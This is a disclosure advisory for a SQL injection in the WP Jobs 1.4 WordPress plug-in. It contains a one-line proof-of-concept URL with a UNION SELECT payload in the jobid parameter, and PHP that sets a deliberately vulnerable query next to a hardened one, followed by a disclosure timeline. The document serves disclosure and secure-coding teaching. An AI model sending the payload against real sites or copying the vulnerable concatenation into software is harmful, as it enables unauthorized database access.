SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter.
Proof of Concept
To reproduce the issue, request the URL below as an authenticated user.
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
The result of the injected query is reflected in the Email input field.
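The vulnerability class described above is a request parameter concatenated directly into a SQL string. The following added illustration is not the WP Jobs plug-in's own code: it shows the unsafe pattern next to the hardened form a WordPress plug-in should use, binding the value through `$wpdb->prepare()` and escaping it on output. The table name `{$wpdb->prefix}job_applications`, its columns, the `wpjobs_demo_*` function names and the `manage_options` capability check are assumptions chosen for the example.

```php
<?php
// Added illustration of the vulnerability class, not the WP Jobs plug-in's actual code.
// Assumes a WordPress environment ($wpdb, absint, esc_attr, current_user_can) and a
// hypothetical table {$wpdb->prefix}job_applications with columns id, job_id, name, email.

// Vulnerable pattern: the request value is concatenated straight into the query, so a
// jobid of "5 UNION ALL SELECT ..." becomes SQL, and whatever the appended SELECT returns
// is rendered into the form (here the email field), exactly as the advisory describes.
function wpjobs_demo_applications_vulnerable( $jobid ) {
    global $wpdb;
    $sql = "SELECT id, job_id, name, email FROM {$wpdb->prefix}job_applications WHERE job_id = " . $jobid;
    return $wpdb->get_results( $sql );
}

// Hardened pattern: coerce the parameter to a non-negative integer and bind it with
// $wpdb->prepare() and the %d placeholder, so the value can never be parsed as SQL.
// absint("5 UNION ALL SELECT ...") yields 5: the injected tail is discarded.
function wpjobs_demo_applications_safe( $jobid ) {
    global $wpdb;
    $jobid = absint( $jobid );
    if ( 0 === $jobid ) {
        return array();
    }
    $sql = $wpdb->prepare(
        "SELECT id, job_id, name, email FROM {$wpdb->prefix}job_applications WHERE job_id = %d",
        $jobid
    );
    return $wpdb->get_results( $sql );
}

// Admin-page handler: check the capability (manage_options is an assumption), read the
// parameter as an integer, and render each value through esc_attr() so a reflected
// database value cannot break out of the HTML attribute either.
function wpjobs_demo_render_applications() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $jobid = isset( $_GET['jobid'] ) ? absint( wp_unslash( $_GET['jobid'] ) ) : 0;
    foreach ( wpjobs_demo_applications_safe( $jobid ) as $row ) {
        printf(
            '<input type="text" name="email" value="%s" readonly>',
            esc_attr( $row->email )
        );
    }
}
```

With the hardened handler, the advisory's request returns only the applications for job 5; the `@@version` reflection depends on the unsafe concatenation in the first function, which is the defect the plug-in update removes.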
Timeline
- 11/06/2017 – Identification of the vulnerability
- 12/06/2017 – Contact with the developer
- 12/06/2017 – Request for CVE
- 12/06/2017 – Contact with WordPress
- 12/06/2017 – A new version of the plug-in released